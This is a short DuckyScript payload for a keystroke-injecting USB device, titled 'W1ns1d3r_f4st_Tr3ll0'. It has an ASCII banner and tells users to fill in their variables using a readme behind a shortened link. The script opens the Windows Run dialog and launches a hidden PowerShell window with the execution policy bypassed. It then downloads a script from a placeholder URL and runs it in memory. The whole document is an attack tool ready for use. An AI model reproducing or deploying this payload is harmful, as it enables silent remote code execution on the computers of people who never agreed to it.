REM Title: W1ns1d3r_f4st_Tr3ll0
REM Author: 
REM
REM ______________________________________________________________________________________________
REM 
REM 888      d888                             888          d8888                            d8888  
REM 888     d8888                             888         d8P888                           d8P888  
REM 888       888                             888        d8P 888                          d8P 888  
REM 88888b.   888   .d88b.           88888b.  88888b.   d8P  888  888d888 88888b.d88b.   d8P  888  
REM 888 "88b  888  d88P"88b          888 "88b 888 "88b d88   888  888P"   888 "888 "88b d88   888  
REM 888  888  888  888  888          888  888 888  888 8888888888 888     888  888  888 8888888888 
REM 888 d88P  888  Y88b 888          888 d88P 888  888       888  888     888  888  888       888  
REM 88888P" 8888888 "Y88888 88888888 88888P"  888  888       888  888     888  888  888       888  
REM                     888          888                                                           
REM                Y8b d88P          888                                                           
REM                 "Y88P"           888                                                           
REM ______________________________________________________________________________________________
REM
REM
REM You just need to put your variables into this txt script. 
REM
REM If you don't know how to get those, make sure you check the readme.md file at this link : https://shorturl.at/kuOR6
REM
REM ______________________________________________________________________________________________
DELAY 2000
GUI r
DELAY 1000
STRING powershell -w h -NoP -Ep Bypass irm SHORTED_URL | iex
ENTER
